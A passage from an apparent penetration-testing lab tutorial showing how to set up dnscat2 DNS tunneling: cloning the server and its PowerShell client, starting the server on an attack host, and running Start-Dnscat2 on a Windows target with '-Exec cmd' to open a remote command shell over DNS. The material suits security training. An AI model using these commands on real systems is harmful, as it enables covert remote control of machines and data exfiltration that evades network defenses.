```shell git clone https://github.com/iagox86/dnscat2.git ``` ```shell sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache ``` After running the server, it will provide us the secret key, which we will have to provide to our dnscat2 client on the Windows host so that it can authenticate and encrypt the data that is sent to our external dnscat2 server. ## Cloning dnscat2-powershell to the Attack Host ```shell git clone https://github.com/lukebaggett/dnscat2-powershell.git ``` Once the `dnscat2.ps1` file is on the target we can import it and run associated cmd-lets. ```powershell Import-Module .\dnscat2.ps1 ``` ```powershell Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd ```